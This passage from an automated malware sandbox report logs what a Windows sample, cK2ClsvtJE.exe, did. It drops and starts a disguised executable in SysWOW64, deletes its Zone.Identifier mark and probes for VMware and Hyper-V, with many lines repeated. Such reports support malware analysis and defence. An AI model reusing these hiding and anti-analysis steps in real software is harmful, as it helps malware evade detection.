                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_029262A0 push ecx; mov dword ptr [esp], 0000BFAAh
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_029262D0 push ecx; mov dword ptr [esp], 00001969h

                Persistence and Installation Behavior:

                barindex
                Drops executables to the windows directory (C:\Windows) and starts themShow sources
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeExecutable created and started: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeExecutable created and started: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exePE file moved: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeJump to behavior
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exePE file moved: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeJump to behavior

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeFile opened: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeFile opened: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: ChangeServiceConfig2W,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap,
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: ChangeServiceConfig2W,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap,
                Source: C:\Windows\System32\svchost.exe TID: 6700Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 6700Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F23A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F23A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02923A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,
                Source: svchost.exe, 00000006.00000002.238658443.00000289C3D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.289264774.0000026208340000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.485679936.000001F7576C0000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.309956263.00000273636A0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000007.00000002.488872425.000002384C65E000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                Source: svchost.exe, 0000000D.00000002.484790522.00000233F8A02000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.488839212.000002384C647000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000006.00000002.238658443.00000289C3D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.289264774.0000026208340000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.485679936.000001F7576C0000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.309956263.00000273636A0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000006.00000002.238658443.00000289C3D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.289264774.0000026208340000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.485679936.000001F7576C0000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.309956263.00000273636A0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 0000000D.00000002.485230682.00000233F8A40000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.484791655.000002C702229000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000006.00000002.238658443.00000289C3D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.289264774.0000026208340000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.485679936.000001F7576C0000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.309956263.00000273636A0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: svchost.exe, 00000006.00000002.238658443.00000289C3D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.289264774.0000026208340000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.485679936.000001F7576C0000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.309956263.00000273636A0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000007.00000002.488872425.000002384C65E000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                Source: svchost.exe, 0000000D.00000002.484790522.00000233F8A02000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.488839212.000002384C647000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000006.00000002.238658443.00000289C3D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.289264774.0000026208340000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.485679936.000001F7576C0000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.309956263.00000273636A0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000006.00000002.238658443.00000289C3D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.289264774.0000026208340000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.485679936.000001F7576C0000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.309956263.00000273636A0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 0000000D.00000002.485230682.00000233F8A40000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.484791655.000002C702229000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000006.00000002.238658443.00000289C3D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.289264774.0000026208340000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.485679936.000001F7576C0000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.309956263.00000273636A0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeProcess information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A51030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A51030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F24190 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F25140 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A16CDE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A10456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A15D2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A1095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A51030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F24190 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F25140 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A16CDE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A10456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A15D2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A1095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A51030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02924190 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02925140 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028A6CDE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028A0456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028A5D2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028A095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028E1030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A51030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A51030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
                Source: GlobCollationHost.exe, 00000004.00000002.486034143.0000000001490000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.486209677.000001C383260000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: GlobCollationHost.exe, 00000004.00000002.486034143.0000000001490000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.486209677.000001C383260000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: GlobCollationHost.exe, 00000004.00000002.486034143.0000000001490000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.486209677.000001C383260000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: GlobCollationHost.exe, 00000004.00000002.486034143.0000000001490000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.486209677.000001C383260000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: GlobCollationHost.exe, 00000004.00000002.486034143.0000000001490000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.486209677.000001C383260000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: GlobCollationHost.exe, 00000004.00000002.486034143.0000000001490000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.486209677.000001C383260000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: GlobCollationHost.exe, 00000004.00000002.486034143.0000000001490000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.486209677.000001C383260000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: GlobCollationHost.exe, 00000004.00000002.486034143.0000000001490000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.486209677.000001C383260000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edb VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
                Sou